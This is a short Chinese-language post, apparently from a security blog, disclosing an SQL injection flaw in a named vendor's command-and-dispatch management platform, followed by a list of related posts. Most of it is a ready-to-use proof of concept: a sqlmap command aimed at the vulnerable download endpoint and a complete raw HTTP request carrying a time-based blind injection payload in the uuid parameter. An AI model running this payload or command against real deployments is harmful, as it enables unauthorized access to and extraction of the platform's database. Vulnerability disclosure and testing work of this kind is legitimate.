福建科立讯通信 指挥调度管理平台 SQL注入漏洞

北峰通信-福建科立讯通信 指挥调度管理平台 SQL注入漏洞

厂商域名和信息收集

域名:

工具sqlmap

python sqlmap.py -u "http://ip:端口/api/client/down_file.php?uuid=1" --batch

数据包

GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%203018%20FROM%20(SELECT(SLEEP(5)))PUiO)%20AND%20%27ayNf%27=%27ayNf HTTP/1.1

Host: ip:端口

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Cookie: PHPSESSID=8gnvk03ni3efhhsf6s6utobua6

Upgrade-Insecure-Requests: 1

Priority: u=0, i

相关推荐
网络安全-老纪2 分钟前
网络安全-js安全知识点与XSS常用payloads
javascript·安全·web安全
API_technology5 分钟前
电商API安全防护:JWT令牌与XSS防御实战
前端·安全·xss
jiugie12 分钟前
MongoDB学习
数据库·python·mongodb
underatted15 分钟前
2025tg最新免费社工库机器人
web安全·网络安全
hzulwy16 分钟前
MongoDB应用设计调优
数据库·mongodb
xmweisi30 分钟前
【华为】报文统计的技术NetStream
运维·服务器·网络·华为认证
VVVVWeiYee34 分钟前
BGP配置华为——路径优选验证
运维·网络·华为·信息与通信
我爱松子鱼35 分钟前
MySQL 单表访问方法详解
数据库·mysql
Tipray200641 分钟前
天 锐 蓝盾终端安全管理系统:办公U盘拷贝使用管控限制
安全
我们的五年1 小时前
MySQL存储引擎:选择与应用
数据库·mysql